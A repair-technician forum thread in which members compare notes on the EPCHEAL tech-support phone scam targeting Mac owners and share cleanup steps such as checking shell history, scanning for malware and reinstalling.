Had two Mac owners contacted.....

[GTP]

Had two Mac owners contacted by a company called EPCHEAL.
They told the clients that "your computer is being attacked by hackers and that you need to sign up to our Protection Plan!"
They were offering a "lifetime plan" for AU$399 or a "yearly plan" for AU$129
They went on to show them a report showing a list of connections to various IP's which they told the clients "were hackers trying to get in!"
They were really quite forceful on the phone and had both clients scared and alarmed.
I informed the clients to not answer if they called, but they call on different numbers.
It was/is obviously a scam along the same lines as the Windows scams.
Both clients allowed them access to the computers, so I don't know what they've installed or changed.
Anyone else had this or heard of EPCHEAL.com?

 

[Markverhyden]

This is very interesting due to the timing. Got a call from a Mac customer yesterday, similar situation. They are unable to provide accurate info other than someone called up, said they had been called, similar blurb. She did say she allowed them access to the computer but did not give them a CC. Told her to unplug the power to the iMac immediately. Going out tomorrow to look things over. She did say they had "problems" but, again, could not provide any details. I'll definitely search for that domain.

Some thoughts on this exploit on OS X.

1. Saving the history of all browsers being used, parse the same.
2. Open Terminal and run history > history.txt, make a copy of the file to thumbdrive, parse the output. This will let me know what was done via CLI. For normal users history is empty except for anything their tech may have done.
3. In Terminal run ls -Al /Users. This will show all accounts.
4. Check the contents of Applications, browser plugins, etc.
5. At this point I'll shutdown the machine, plug the network cable in, boot into safe mode and install MBAM, run same.

Edit: sudo does not work the same in OS X. Forgot about that. Deleted sudo references.

 

[GTP]

Thank you @Markverhyden I now have a starting point.

 

[sapphirescales]

Whenever a client gives remote access to a scammer, it's nuke n' pave time. You never know what they might have installed (rootkits, keyloggers, etc.). It's always a financial motivation so chances are they've done something to try to steal the client's credit cards and/or identity and if that happens and you gave their computer a clean bill of health, they can sue YOU for not doing your job properly.

 

[overburnz]

I've had a customer yesterday with similar problem, started to have some problems on her macbook air and then a popup appeared with a foreign phone number, pay attention that i'm in portugal!, when she called the phone number they only spoke in english and insisted that she did the same, well after a 50min conversation with the "so called" apple assistant, she gave them remote acess wich they used to show her that the machine was infected and showed her the ip's that were trying to enter her computer.
They then asked her for 1000$ US to fix her computer, she didn't gave them any CC data, saying that she didn't have one.
The scammer turned more agressive saying that if she didn't pay them by 6pm yesterday that they would lock her out of her computer.
I gave it a look and tried to do a backup but by the time that i tried to log in again the password wouldn't work...
Had the same kind of scammers last year doing the same with microsoft users....

 

[Markverhyden]

I've had a customer yesterday with similar problem, started to have some problems on her macbook air and then a popup appeared with a foreign phone number, pay attention that i'm in portugal!, when she called the phone number they only spoke in english and insisted that she did the same, well after a 50min conversation with the "so called" apple assistant, she gave them remote acess wich they used to show her that the machine was infected and showed her the ip's that were trying to enter her computer.
They then asked her for 1000$ US to fix her computer, she didn't gave them any CC data, saying that she didn't have one.
The scammer turned more agressive saying that if she didn't pay them by 6pm yesterday that they would lock her out of her computer.
I gave it a look and tried to do a backup but by the time that i tried to log in again the password wouldn't work...
Had the same kind of scammers last year doing the same with microsoft users....

If they did not turn on FileVault then that's not too big of a deal. It's easy to boot into Single user mode and create a new admin account. You can then take control of the old one.

https://www.jamf.com/jamf-nation/discussions/9096/creating-new-users-command-line-single-user-mode

The big problem is the Firmware password. It's not easy, but if they have the knowledge and time they can do that without booting into recovery mode.

https://www.cnet.com/news/how-to-set-a-firmware-password-without-rebooting-in-os-x/

 

[NYJimbo]

I'm amazed how some people will fork over $399 to a stranger on the phone, but they whine when you try to charge them $80 for the same job.

 

[Archon Prime]

Then you have this on their Faq page and I laughed hard. This site is such a scam. I doubt very much it's a legit program. Probably spyware or something that will benefit them in something else.

Can I install ePCeal Antivirus edition on my mac?
ePCheal Antivirus is currently compatible with the Windows operating system/s only. A new Mac version is due soon, so please make sure you keep connected through our website for future releases and updates.

 

[BennyDenny]

I received a similar call the other day. Client needed their mac fixed. I'm heading out there later. Will update if I can find the website. This is becoming outrageous.

 

[Markverhyden]

Update on my customer.

Still do not have all the details and probably never will. Not sure if it's by design or customer ignorance.

She said the owner called her this weekend about having some problem on the weekend. She said she had been some "windows" with lots of number and letters popping up on Monday. Of course she did not take any pictures (she definitely will in the future). What is odd is they called the business and knew her name. Said they were from Microsoft Word and not native English speakers.

They had her connect via GoToAssist from Citrix. Checked the computer thoroughly, no CLI activity, only GoTo installed. Removed same. Malware scans spotless. They did the typical trick of pulling up Console, which shows log entries. As expected there will be entries with the word error, which they use to alarm the EU so they will pay them. Browser history was clean as well. However the FF search was set to Yahoo which is a prime distributor of crapware via the top of page paid ads. So maybe the owner did something and is not fessing up.

 

[GTP]

Same here @Markverhyden connected via GoToAssist, + installed, no CLI activity, Browser history clean and Chrome, on one, FF on the other set to Yahoo.
Malware scans showed nothing.
Same with both these clients re pulling up the Console to "show them all the hackers errors!"